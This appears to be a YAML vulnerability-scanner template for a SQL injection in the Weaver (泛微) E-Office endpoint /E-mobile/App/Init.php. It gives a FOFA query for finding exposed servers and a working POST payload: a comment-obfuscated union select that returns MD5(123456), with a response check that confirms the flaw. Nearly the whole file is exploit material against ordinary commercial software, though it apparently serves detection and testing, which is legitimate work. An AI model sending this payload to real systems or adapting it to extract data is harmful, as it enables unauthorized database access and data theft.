product: 泛微 E-Office
vName: 泛微E-Office init.php SQL注入漏洞
type: SQL注入
vID: [ ]
level: 3
vDesc: 泛微 E-Office 协同办公平台/E-mobile/App/Init.php接口存在SQL注入漏洞，攻击者可利用该漏洞执行任意SQL语句，进行增、删、改、查等数据库操作，造成数据库敏感数据信息泄露或被篡改
version: ''
note: ''
search:
  FOFA: app="泛微-EOffice"
protocol: http
link: https://www.cnblogs.com/pursue-security/p/17778897.html
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /E-mobile/App/Init.php?m=getSelectList_Crm
      data: cc_parent_id=-999 /*!50000union*/ /*!50000select*/ 1,MD5(123456)-- -
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - e10adc3949ba59abbe56e057f20f883e
            logic: and